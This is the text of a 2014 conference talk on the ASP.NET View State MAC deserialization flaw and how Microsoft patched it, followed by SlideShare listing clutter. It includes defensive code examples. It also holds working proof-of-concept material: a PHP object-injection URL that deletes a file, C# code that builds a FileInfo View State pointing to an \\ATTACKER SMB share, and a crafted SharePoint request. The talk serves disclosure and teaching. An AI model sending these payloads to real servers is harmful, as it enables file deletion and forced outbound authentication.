Application Security Forum - 2014 Western Switzerland 
05-06 November 2014 - Y-Parc / Yverdon-les-Bains 
http://www.appsec-forum.ch 
Why .NET needs MACs and other serial(-ization) tales 
Alexandre Herzog 
CTO / Compass Security Schweiz AG
Agenda 
About the tale and its storyteller 
Once upon a time… 
Tales “Why does .NET need MACs” 
“Serialization” tales 
When the stories come together – my tale 
Time sequence of the (patch) battle 
Is the ugly bug really dead? 
Happy end (?) 
2
About the tale 
It’s the story of a simple web app test which ended up uncovering a design issue within the .NET framework. 
I won’t cover the disclosure process in detail 
•Not that I don’t want to, but I don’t have time for it 
•Feel free to come over and discuss this afterwards 
–Ideally over a glass of wine ;-) 
3
About its storyteller 
A Vaudois first exiled to Valais, then Wellington (New Zealand) and now Zürich 
Breaking stuff since 2010 for Compass Security 
•Previously worked for banks as sysadmin / developer 
Finished my MAS in Information Security in 2013 
•MAS thesis about “Crypto-based security mechanisms in Windows and .NET” 
Author of several security advisories 
•And still no Twitter handle (!) 
4
Once upon a time… 
September 2012, 
•during a standard ASP.NET web application assessment… 
<body> 
<form name="aspnetForm" method="post" action="[…]" id="aspnetForm"> 
<div> 
<input type="hidden" […] value="" /> 
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> 
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value=""/> 
<input type="hidden" name="__VSTATE" id="__VSTATE" 
value="[LONG_BASE64_STRING]" /> 
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="" /> 
</div> 
6
Once upon a time… 
// Custom View State persistence found in the assessed application (slide code with
// indentation restored): the field is base64-decoded, optionally decompressed and
// handed straight to a default LosFormatter, i.e. deserialized without any MAC check.
protected override object LoadPageStateFromPersistenceMedium()
{
    string viewState = Request.Form["__VSTATE"];
    byte[] bytes = Convert.FromBase64String(viewState);
    if (Helper.obterFlagCompressViewState())
        bytes = Compressor.Decompress(bytes);
    LosFormatter formatter = new LosFormatter();   // parameterless constructor: MAC disabled
    return formatter.Deserialize(Convert.ToBase64String(bytes));
}

protected override void SavePageStateToPersistenceMedium(object viewState)
{
    LosFormatter formatter = new LosFormatter();   // same formatter, so no MAC is appended
    StringWriter writer = new StringWriter();
    formatter.Serialize(writer, viewState);
    string viewStateString = writer.ToString();
    byte[] bytes = Convert.FromBase64String(viewStateString);
    if (Helper.obterFlagCompressViewState())
        bytes = Compressor.Compress(bytes);
    x.RegisterHiddenField(Page, "__VSTATE", Convert.ToBase64String(bytes));
}
8
Once upon a time… 
We have 
•A custom implementation of the __VIEWSTATE field 
•Its value is stored compressed within __VSTATE 
•It uses the default LosFormatter object constructor 
•No Machine Authentication (sic) Code (MAC) is used 
•The __VIEWSTATE field sent to the client is therefore not integrity-protected 
–Despite the fact we serialize / deserialize objects… 
The same applies to regular ASP.NET pages 
•If property EnableViewStateMac is disabled (enabled by default) 
10
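The fix for the custom persister above, as an added example (not the audited application's code and not Microsoft's): the serialized state is sealed with MachineKey.Protect() on the way out and MachineKey.Unprotect() verifies the MAC on the way in, so LosFormatter never deserializes a modified field; it assumes .NET 4.5+ and a hypothetical page class name.

```csharp
using System;
using System.IO;
using System.IO.Compression;
using System.Security.Cryptography;
using System.Web;
using System.Web.Security;
using System.Web.UI;

// Hypothetical replacement for the __VSTATE persister shown on the slide (added
// example, not the application's or Microsoft's code). Needs .NET 4.5+.
public class ProtectedVStatePage : Page
{
    // Purpose strings bind the MAC to this use: a blob MachineKey.Protect() produced
    // for another purpose (e.g. a cookie) does not verify here.
    private static readonly string[] Purposes = { "ProtectedVStatePage", "__VSTATE" };

    protected override void SavePageStateToPersistenceMedium(object state)
    {
        var formatter = new LosFormatter();
        using (var writer = new StringWriter())
        {
            formatter.Serialize(writer, state);
            byte[] raw = Compress(Convert.FromBase64String(writer.ToString()));
            // Encrypt and HMAC with the keys from <machineKey />: the field becomes
            // opaque and integrity-protected, as EnableViewStateMac would make it.
            byte[] sealedState = MachineKey.Protect(raw, Purposes);
            ClientScript.RegisterHiddenField("__VSTATE", Convert.ToBase64String(sealedState));
        }
    }

    protected override object LoadPageStateFromPersistenceMedium()
    {
        string field = Request.Form["__VSTATE"];
        if (string.IsNullOrEmpty(field))
            return null;

        byte[] raw;
        try
        {
            // Unprotect verifies the MAC before decrypting and throws on any
            // client-side modification, so tampered bytes never reach LosFormatter.
            raw = MachineKey.Unprotect(Convert.FromBase64String(field), Purposes);
        }
        catch (FormatException) { throw new HttpException(400, "Malformed __VSTATE"); }
        catch (CryptographicException) { throw new HttpException(400, "Invalid __VSTATE MAC"); }

        // Decompression runs only on authenticated data, so a crafted compressed
        // payload cannot be used to exhaust server memory.
        var formatter = new LosFormatter();
        return formatter.Deserialize(Convert.ToBase64String(Decompress(raw)));
    }

    private static byte[] Compress(byte[] data)
    {
        using (var ms = new MemoryStream())
        {
            using (var gz = new GZipStream(ms, CompressionMode.Compress, true))
                gz.Write(data, 0, data.Length);
            return ms.ToArray();
        }
    }

    private static byte[] Decompress(byte[] data)
    {
        using (var src = new MemoryStream(data))
        using (var gz = new GZipStream(src, CompressionMode.Decompress))
        using (var dst = new MemoryStream())
        {
            gz.CopyTo(dst);
            return dst.ToArray();
        }
    }
}
```

With a static <machineKey /> the same keys must be deployed on every node of a farm, otherwise Unprotect() fails on the node that did not produce the field.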
Tales “Why does .NET need MACs” 
A View State Contains 
•2 bytes of header data (ASP.NET 1.1 versus 2.0+) 
•A tree of serialized objects (View State Bag & Serialized ASP.NET controls of the page) 
•A (H)MAC ensuring integrity (if configured so – default: enabled) 
A View State 
•Can be encrypted 
•Can be split into blocks of x bytes (__VIEWSTATEFIELDCOUNT & __VIEWSTATEx fields) 
•Can include user defined values to ensure a unique MAC is generated (Page.ViewStateUserKey property) 
12
Tales “Why does .NET need MACs” 
View State handling and lifecycle (diagram on slide 13) 
•Request from the client comes in 
•Deserialize: ASP.NET deserializes the View State and copies the values back into the controls 
•Serialize: the controls’ state is serialized into the View State again 
•Response is sent to the client 
13
Tales “Why does .NET need MACs” 
State of the art of hacking View States back then: 
Trustwave's SpiderLabs Security Advisory TWSL2010-001: 
Multiplatform View State Tampering Vulnerabilities 
Published: 2010-02-08 Version: 1.1 
SpiderLabs has documented view state tampering vulnerabilities in three products from separate vendors. View states are used by some web application frameworks to store the state of HTML GUI controls. View states are typically stored in hidden client-side input fields, although server-side storage is widely supported. 
Credit: David Byrne of Trustwave's SpiderLabs The ASP.Net view state is typically stored in a hidden field named "__VIEWSTATE". When a page's view state is not cryptographically signed, many standard .Net controls are vulnerable to Cross-Site Scripting (XSS) through the view state. 
14
15
Tales “Why does .NET need MACs” 
Inappropriate Microsoft advice back then (Trustwave): 
16
Tales “Why does .NET need MACs” 
State of the art of exploiting ASP.NET View State fields without MACs: 
•Abuse them for XSS 
•You must have an existing control on the page accepting HTML to inject your payload 
Back in 2010, Trustwave already identified RCE in Mojarra (Java) View State via Expression Language 
•Implemented in their “Deface” tool 
•This attack was presented in MISC magazine #69 
17
Tales “Why does .NET need MACs” 
Back to September 2012: so ASP.NET unprotected View State fields can be misused 
•But “only” for XSS when a few pre-conditions are met 
•And computing a MAC is bad for performance according to Microsoft articles (or was at least in 2010) 
Some pages in e.g. SharePoint do not enforce a MAC on the View State 
•View State on these pages is empty, so you can’t misuse them for XSS 
18
“Serialization” tales 
Serialization is known to be an issue in web apps 
•Potentially user defined content gets deserialized on the server 
•Depends on the technology and the application’s code 
•Tool “Deface” targets Apache MyFaces 1.2.8 applications 
Let’s see a PHP example: 
20
“Serialization” tales 
class Example1
{
    public $cache_file;

    function __construct()
    {
        // some PHP code...
    }

    // Runs when the object is destroyed and deletes the file named in $cache_file
    function __destruct()
    {
        $file = "/var/www/cache/tmp/{$this->cache_file}";
        if (file_exists($file)) @unlink($file);
    }
}

// some PHP code...
$user_data = unserialize($_GET['data']);   // user-controlled input becomes an object
// some PHP code...
21
“Serialization” tales 
Flaw can be exploited with the following link 
•http://testsite.com/vuln.php?data=O:8:"Example1":1:{s:10:"cache_file";s:15:"../../index.php";} 
When receiving this request, the server 
•Takes the GET parameter “data” and unserializes it 
•Instantiates an object of class “Example1” from it 
•Assigns the value “../../index.php” to the property “cache_file” 
•When the page lifetime is over, method “__destruct()” of object “Example1” is called, which deletes the file 
Can the same be done with .NET? 
22
23
“Serialization” tales 
Great research of James Forshaw (Context) 
Studying (and exploiting) .NET serialization via 
•IFormatter 
•XML Serialization 
•WCF Data Contracts 
•JSON 
But not a word about serialization of 
•View State field 
•LosFormatter object (limited object serialization) 
24
“Serialization” tales 
Awesomeness of James Forshaw’s research 
•Standard .NET object TempFileCollection deletes files in destructor 
[Serializable]
public class TempFileCollection
{
    private Hashtable files; // Deserialized list of files
    // Other stuff...

    ~TempFileCollection()
    {
        foreach (string file in files.Keys)
        {
            File.Delete(file); // Makes sure to delete them when
                               // the object is destroyed!
        }
    }
}
25
“Serialization” tales 
Awesomeness of James Forshaw’s research 
•Standard .NET object FileInfo triggers SMB requests 
// Simplified view of the framework class (backslashes lost in the slide export restored)
[Serializable]
public class FileInfo
{
    private string FullPath;

    protected FileInfo(SerializationInfo info, StreamingContext context)
    {
        // Ensures path is canonical
        FullPath = NormalizePath(info.GetString("FullPath"));
    }
}

string NormalizePath(string path)
{
    string currPath = "";
    string[] parts = path.Split('\\');
    foreach (string part in parts)
    {
        currPath += "\\" + part;
        if (part[0] == '~') {          // If potential short path,
            GetLongPathName(currPath); // call Windows API (a UNC path triggers an SMB request)
        }
    }
    return currPath;
}
26
When the stories come together – My tale 
What if I can combine the fact I now have 
•A View State field without integrity protection (resp. MAC) 
•Known .NET objects having interesting (de)serialization actions 
If possible, I would be able to e.g. 
•Delete a file on the server 
•Get the server to initiate a SMB request to e.g. the attacker’s machine 
Can I apply it? 
Can it be done within the few hours left onsite? 
28
When the stories come together – My tale 
using System;
using System.IO;
using System.Text;
using System.Web.UI;

// created in a hurry by Alexandre Herzog, csnc.ch, 20.09.2012
// (backslashes in the two paths were lost in the slide export and are restored here)
public class ExploitViewstate
{
    // Caution: both files must be the same length!
    static String bugusFile = @"\\ATTACKER\~testtext.txt";
    static String dummyFile = @"c:\testCompass\testVS.txt";

    public static void Main(string[] args)
    {
        String validViewstate = GenerateValidViewstate();
        Console.WriteLine("Valid viewstate: {0}", validViewstate);
    }

    // Serializes a FileInfo object with the default LosFormatter, i.e. without MAC
    private static String GenerateValidViewstate()
    {
        FileInfo fi = new FileInfo(dummyFile);
        LosFormatter los = new LosFormatter();
        using (StringWriter sw = new StringWriter())
        {
            los.Serialize(sw, fi);
            return sw.ToString();
        }
    }
}
29
When the stories come together – My tale 
C:\>set csc=c:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe 
C:\>%csc% exploitViewstate.cs && exploitViewstate.exe 
Microsoft (R) Visual C# 2005 Compiler version 8.00.50727.4927 
for Microsoft (R) Windows (R) 2005 Framework version 2.0.50727 
Copyright (C) Microsoft Corporation 2001-2005. All rights reserved. 
Valid View State: /wEyhAEAAQAAAP////8BAAAAAAAAAAQBAAAAElN5c3RlbS5JTy5GaWxlSW5mbwI 
AAAAMT3JpZ2luYWxQYXRoCEZ1bGxQYXRoAQEGAgAAABljOlx0ZXN0Q29tcGFzc1x0ZXN0VlMudHh0BgMAAAAZYzpcdGVzdENvbXBhc3NcdGVzdFZTLnR4dAs= 
For the PoC, we need to change the file in the above Base64 string from 
•c:\testCompass\testVS.txt 
to 
•\\ATTACKER\~testtext.txt 
30
When the stories come together – My tale 
On an unpatched SharePoint, just send the following request: 
•http://<sharepoint>/_layouts/viewlsts.aspx?BaseType=0&__VIEWSTATE=/wEyhAEAAQAAAP////8BAAAAAAAAAAQBAAAAElN5c3RlbS5JTy5GaWxlSW5mbwIAAAAMT3JpZ2luYWxQYXRoCEZ1bGxQYXRoAQEGAgAAABlcXGRiXH50ZXN0eHh4eFx0ZXN0VlMudHh0BgMAAAAZXFxkYlx%2bdGVzdHh4eHhcdGVzdFZTLnR4dAs%3d 
31
When the stories come together – My tale 
In the SharePoint logs: 
09/25/2012 17:49:25.68 w3wp.exe (0x0C04) 0x03E4 SharePoint Foundation Monitoring nasq Medium Entering monitored scope (Request (GET:http://sps:80/_layouts/viewlsts.aspx?BaseType=0&__VIEWSTATE=/wEyhAEAAQAAAP////8BAAAAAAAAAAQBAAAAElN5c3RlbS5JTy5GaWxlSW5mbwIAAAAMT3JpZ2luYWxQYXRoCEZ1bGxQYXRoAQEGAgAAABlcXGRiXH50ZXN0eHh4eFx0ZXN0VlMudHh0BgMAAAAZXFxkYlx%2bdGVzdHh4eHhcdGVzdFZTLnR4dAs%3d)) 
[…] 
09/25/2012 17:49:44.24 w3wp.exe (0x0C04) 0x03E4 SharePoint Foundation Runtime tkau Unexpected System.InvalidCastException: Unable to cast object of type 'System.IO.FileInfo' to type 'System.Web.UI.Pair'. at System.Web.UI.HiddenFieldPageStatePersister.Load() c263fbf5-6190-481e-8b21-c2cb5d04222b 
33
When the stories come together – My tale 
Demo! 
When the View State MAC is disabled, you can 
•Delete a file on the server (via object TempFileCollection) 
•Get the server to initiate a SMB request to e.g. the attacker’s machine (via object FileInfo) 
•I wasn’t able to get a generic remote code execution (so far) 
–Highly dependent on the application / content of the server’s GAC 
–But I heard this week that it’s possible to get RCE and that some smarter people than I have a working exploit… 
34
Time sequence of the (patch) battle 
Disclosure milestones 
•26.09.2012 Initial contact with MSRC 
•19.02.2013 Microsoft aims for a fix in SharePoint in May 
•28.02.2013 Microsoft confirms work is under way for SkyDrive 
•15.04.2013 Patch postponed (issues found during tests); MS will issue guidance about the View State MAC 
•03.07.2013 Patch again postponed (issues found during tests) 
•16.08.2013 Detailed answer about the next steps; BlueHat invitation 
•10.09.2013 September’s patch Tuesday with MS13-067 (Vulnerabilities in Microsoft SharePoint Server Could Allow Remote Code Execution) 
36
Time sequence of the (patch) battle 
Disclosure milestones (continued) 
•06.11.2013 Conference call with Microsoft 
•10.12.2013 December’s patch Tuesday with 
–MS13-100 (Vulnerabilities in Microsoft SharePoint Server Could Allow RCE) 
–MS13-105 (Vulnerabilities in Microsoft Exchange Server Could Allow RCE) 
–KB2905247 (Insecure ASP.NET Site Configuration Could Allow Elevation of Privilege) 
•11.12.2013 Meeting with several Microsoft people in Seattle 
37
Time sequence of the (patch) battle 
Disclosure milestones (continued) 
•05.05.2014 Release of ASP.NET 4.5.2 which forbids disabling the View State MAC 
•13.05.2014 May’s patch Tuesday with MS14-024 (SharePoint) 
•07.08.2014 Announcement that only the latest (ASP).NET framework will be supported from 2016 onward 
•09.09.2014 Release to all customers via Windows Update of the December 2013 patch KB2905247 
You are now safe… … if you install all suggested WU patches 
38
Time sequence of the (patch) battle 
But what was the content of 
•MS13-100 / CVE-2013-5059 
•MS14-022 / CVE-2014-0251 (?) & CVE-2014-1813 (?) 
Microsoft did their homework 
•A cross-product/company wide effort was made to address serialisation / View State issues 
•Several additional attack vectors were found and fixed 
39
Time sequence of the (patch) battle 
Extract of MS13-100 (CVE-2013-5059) 
•New namespace “Microsoft.Office.Server.Security” 
•New internal class SafeSerialization with methods 
»IsSafeBinaryFormatterStreamWithAllowList([…]) […] 
»IsSafeBinaryFormatterStreamCommon( […]) 
•Usage within SharePoint: 
40
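The allow-list idea behind SafeSerialization, as an added example (not SharePoint's or Microsoft's code): a SerializationBinder that resolves only the types the page expects, so a FileInfo or TempFileCollection record in a BinaryFormatter stream is refused before the type is ever instantiated; ListFilter and the file path are constructed sample values. LosFormatter exposes no binder, which is why the View State MAC is the only guard there, and BinaryFormatter itself is deprecated, so this is hardening for legacy code rather than a reason to keep using it.

```csharp
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Runtime.Serialization;
using System.Runtime.Serialization.Formatters.Binary;

// The only type this (hypothetical) page stores in its state.
[Serializable]
public sealed class ListFilter
{
    public string SortColumn;
    public int PageSize;
}

// BindToType runs when the formatter meets a type record, before any instance
// exists, so a refused type never gets its deserialization constructor or
// finalizer executed. Throwing (rather than returning null) matters: a null
// result makes BinaryFormatter fall back to its default type resolution.
public sealed class AllowListBinder : SerializationBinder
{
    private static readonly Dictionary<string, Type> Allowed =
        new[] { typeof(ListFilter) }.ToDictionary(t => t.FullName, t => t, StringComparer.Ordinal);

    public override Type BindToType(string assemblyName, string typeName)
    {
        Type resolved;
        if (Allowed.TryGetValue(typeName, out resolved))
            return resolved;
        throw new SerializationException("Type not on the allow list: " + typeName);
    }
}

public static class SafeState
{
    public static byte[] Serialize(object graph)
    {
        using (var ms = new MemoryStream())
        {
            new BinaryFormatter().Serialize(ms, graph);
            return ms.ToArray();
        }
    }

    public static object Deserialize(byte[] data)
    {
        var formatter = new BinaryFormatter { Binder = new AllowListBinder() };
        using (var ms = new MemoryStream(data))
            return formatter.Deserialize(ms);
    }

    public static void Main()
    {
        // Expected state round-trips through the binder.
        var ok = (ListFilter)Deserialize(Serialize(new ListFilter { SortColumn = "Title", PageSize = 30 }));
        Console.WriteLine("accepted: {0}/{1}", ok.SortColumn, ok.PageSize);

        // A serialized FileInfo (one of the gadget types from the talk) is rejected
        // before its constructor runs, so the path is never touched.
        byte[] unexpected = Serialize(new FileInfo(@"C:\placeholder.txt"));
        try { Deserialize(unexpected); }
        catch (SerializationException e) { Console.WriteLine("rejected: " + e.Message); }
    }
}
```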
Is the ugly bug really dead? 
Yes if you patch adequately 
•No pages in SharePoint should be vulnerable 
•No pages in Outlook Web Access should be vulnerable 
•Disabling the Viewstate MAC should not be possible anymore with patch KB2905247 installed 
This patch securing the Viewstate is controversial 
•“We deliberately broke backward compatibility to keep you safe. […] and this is something I’m horrendously proud of” 
But how is the MAC computed? 
•Using the keys defined in <machineKey /> 
42
Is the ugly bug really dead? 
Result of an audit searching for static machineKey entries 
44
Is the ugly bug really dead? 
If I have your machineKey… 
•… I can generate a valid View State MAC too 
•Well, I can also generate a Forms Authentication cookie among other things… 
Issue was formally reported to Microsoft in August 2013 
•Microsoft contacted the affected projects 
How do you manage your machineKeys? 
45
The (happy?) end 
Ensure your products are patched / unaffected 
•SharePoint (MS13-067 & MS13-100) 
•Exchange (OWA – MS13-105) 
•ASP.NET (KB2905247) 
•All your other third party ASP.NET sites 
If you don’t use ASP.NET 4.5.2 yet 
•Plan to move to this version, as Microsoft will drop support for older versions in 2016 
47
The (happy?) end 
Verify your ASP.NET applications 
•Don’t deserialize untrusted documents (e.g. on file uploads) 
•Don’t re-implement custom Viewstate-like features 
Ensure you manage your machineKeys correctly 
•If static keys are defined, manage them as carefully as all your other cryptographic material 
•No copy/paste from the Internet, dedicated keys per environment, … 
•Encrypt the sensitive sections of your web.config 
48
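Two of the machineKey recommendations above in code, as an added example (not from the talk or from Microsoft): a generator for fresh per-environment keys and a small audit that flags a static key reused across several web.config files, run here on two constructed configs written to a temporary directory (the key value in them is a made-up sample).

```csharp
using System;
using System.Collections.Generic;
using System.IO;
using System.Security.Cryptography;
using System.Xml.Linq;

public static class MachineKeyAudit
{
    // Fresh random keys: 64 bytes for validationKey (HMACSHA256), 32 bytes for
    // decryptionKey (AES-256), hex-encoded as <machineKey /> expects them.
    public static string NewMachineKeyElement()
    {
        using (var rng = new RNGCryptoServiceProvider())
        {
            return string.Format(
                "<machineKey validationKey=\"{0}\" decryptionKey=\"{1}\" validation=\"HMACSHA256\" decryption=\"AES\" />",
                RandomHex(rng, 64), RandomHex(rng, 32));
        }
    }

    private static string RandomHex(RandomNumberGenerator rng, int byteCount)
    {
        var buf = new byte[byteCount];
        rng.GetBytes(buf);
        return BitConverter.ToString(buf).Replace("-", "");
    }

    // Flags a static key that occurs in more than one web.config, i.e. a key shared
    // between environments or pasted from a common source.
    public static List<string> FindSharedKeys(IEnumerable<string> configPaths)
    {
        var findings = new List<string>();
        var firstSeenIn = new Dictionary<string, string>(StringComparer.OrdinalIgnoreCase);
        foreach (string path in configPaths)
        {
            foreach (XElement mk in XDocument.Load(path).Descendants("machineKey"))
            {
                foreach (string attr in new[] { "validationKey", "decryptionKey" })
                {
                    XAttribute a = mk.Attribute(attr);
                    // Absent or AutoGenerate keys are per machine; nothing to compare.
                    if (a == null || a.Value.StartsWith("AutoGenerate", StringComparison.OrdinalIgnoreCase))
                        continue;
                    string other;
                    if (firstSeenIn.TryGetValue(a.Value, out other))
                        findings.Add(string.Format("{0}: {1} reused from {2}", path, attr, other));
                    else
                        firstSeenIn[a.Value] = path;
                }
            }
        }
        return findings;
    }

    public static void Main()
    {
        // Constructed sample: a test and a production config sharing one pasted key.
        string shared = "<configuration><system.web>" +
            "<machineKey validationKey=\"0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF\" " +
            "decryptionKey=\"0123456789ABCDEF0123456789ABCDEF\" validation=\"HMACSHA256\" decryption=\"AES\" />" +
            "</system.web></configuration>";
        string dir = Path.Combine(Path.GetTempPath(), Path.GetRandomFileName());
        Directory.CreateDirectory(dir);
        string test = Path.Combine(dir, "test.web.config");
        string prod = Path.Combine(dir, "prod.web.config");
        File.WriteAllText(test, shared);
        File.WriteAllText(prod, shared);

        foreach (string finding in FindSharedKeys(new[] { test, prod }))
            Console.WriteLine(finding);            // prod reuses both keys from test

        Console.WriteLine(NewMachineKeyElement()); // replacement keys for one environment
    }
}
```

Once the new element is in place, the section can be encrypted at rest with aspnet_regiis.exe -pe "system.web/machineKey" -app "/YourApp" (the same tool used for connectionStrings).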
Questions? 
49
Merci/Thank you! 
Contact: 
alexandre.herzog@csnc.ch 
Blog http://blog.csnc.ch/ 
LinkedIn http://ch.linkedin.com/in/alexandreherzog/ 
G+ https://plus.google.com/u/1/109572456864701444940/ 
Slides: 
http://slideshare.net/ASF-WS/presentations 
http://appsec-forum.ch 
50
References 
Understanding ASP.NET View State http://msdn.microsoft.com/en-us/library/ms972976.aspx 
Beware of Serialized GUI Objects Bearing Data https://www.blackhat.com/presentations/bh-dc-10/Byrne_David/BlackHat-DC-2010-Byrne-SGUI-slides.pdf 
OWASP - PHP Object Injection https://www.owasp.org/index.php/PHP_Object_Injection 
Are you my Type? https://media.blackhat.com/bh-us-12/Briefings/Forshaw/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf 
Barry Dorrans - Going beyond OWASP (esp. 36:40 to 46:45) http://vimeo.com/108438465 
Moving to the .NET Framework 4.5.2 http://blogs.msdn.com/b/dotnet/archive/2014/08/07/moving-to-the-net-framework-4-5-2.aspx 
Farewell, EnableViewStateMac! http://blogs.msdn.com/b/webdev/archive/2014/09/09/farewell-enableviewstatemac.aspx 
51

Corporations - the new victims of targeted ransomwareCyber Security Alliance
 
Introducing Man in the Contacts attack to trick encrypted messaging apps
Introducing Man in the Contacts attack to trick encrypted messaging appsIntroducing Man in the Contacts attack to trick encrypted messaging apps
Introducing Man in the Contacts attack to trick encrypted messaging appsCyber Security Alliance
 
Understanding the fundamentals of attacks
Understanding the fundamentals of attacksUnderstanding the fundamentals of attacks
Understanding the fundamentals of attacksCyber Security Alliance
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemCyber Security Alliance
 
Easy public-private-keys-strong-authentication-using-u2 f
Easy public-private-keys-strong-authentication-using-u2 fEasy public-private-keys-strong-authentication-using-u2 f
Easy public-private-keys-strong-authentication-using-u2 fCyber Security Alliance
 
Create a-strong-two-factors-authentication-device-for-less-than-chf-100
Create a-strong-two-factors-authentication-device-for-less-than-chf-100Create a-strong-two-factors-authentication-device-for-less-than-chf-100
Create a-strong-two-factors-authentication-device-for-less-than-chf-100Cyber Security Alliance
 
Offline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setupOffline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setupCyber Security Alliance
 
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...Cyber Security Alliance
 
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptWarning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptCyber Security Alliance
 
Killing any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented featureKilling any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented featureCyber Security Alliance
 

More from Cyber Security Alliance (20)

Bug Bounty @ Swisscom
Bug Bounty @ SwisscomBug Bounty @ Swisscom
Bug Bounty @ Swisscom
 
Robots are among us, but who takes responsibility?
Robots are among us, but who takes responsibility?Robots are among us, but who takes responsibility?
Robots are among us, but who takes responsibility?
 
iOS malware: what's the risk and how to reduce it
iOS malware: what's the risk and how to reduce itiOS malware: what's the risk and how to reduce it
iOS malware: what's the risk and how to reduce it
 
Why huntung IoC fails at protecting against targeted attacks
Why huntung IoC fails at protecting against targeted attacksWhy huntung IoC fails at protecting against targeted attacks
Why huntung IoC fails at protecting against targeted attacks
 
Corporations - the new victims of targeted ransomware
Corporations - the new victims of targeted ransomwareCorporations - the new victims of targeted ransomware
Corporations - the new victims of targeted ransomware
 
Blockchain for Beginners
Blockchain for Beginners Blockchain for Beginners
Blockchain for Beginners
 
Le pentest pour les nuls #cybsec16
Le pentest pour les nuls #cybsec16Le pentest pour les nuls #cybsec16
Le pentest pour les nuls #cybsec16
 
Introducing Man in the Contacts attack to trick encrypted messaging apps
Introducing Man in the Contacts attack to trick encrypted messaging appsIntroducing Man in the Contacts attack to trick encrypted messaging apps
Introducing Man in the Contacts attack to trick encrypted messaging apps
 
Understanding the fundamentals of attacks
Understanding the fundamentals of attacksUnderstanding the fundamentals of attacks
Understanding the fundamentals of attacks
 
Rump : iOS patch diffing
Rump : iOS patch diffingRump : iOS patch diffing
Rump : iOS patch diffing
 
An easy way into your sap systems v3.0
An easy way into your sap systems v3.0An easy way into your sap systems v3.0
An easy way into your sap systems v3.0
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande Modem
 
Easy public-private-keys-strong-authentication-using-u2 f
Easy public-private-keys-strong-authentication-using-u2 fEasy public-private-keys-strong-authentication-using-u2 f
Easy public-private-keys-strong-authentication-using-u2 f
 
Create a-strong-two-factors-authentication-device-for-less-than-chf-100
Create a-strong-two-factors-authentication-device-for-less-than-chf-100Create a-strong-two-factors-authentication-device-for-less-than-chf-100
Create a-strong-two-factors-authentication-device-for-less-than-chf-100
 
Offline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setupOffline bruteforce attack on wi fi protected setup
Offline bruteforce attack on wi fi protected setup
 
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
 
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptWarning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
 
Killing any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented featureKilling any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented feature
 
Rump attaque usb_caralinda_fabrice
Rump attaque usb_caralinda_fabriceRump attaque usb_caralinda_fabrice
Rump attaque usb_caralinda_fabrice
 
Operation emmental appsec
Operation emmental appsecOperation emmental appsec
Operation emmental appsec
 

Recently uploaded

New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxLoriGlavin3
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 
Ensuring Technical Readiness For Copilot in Microsoft 365
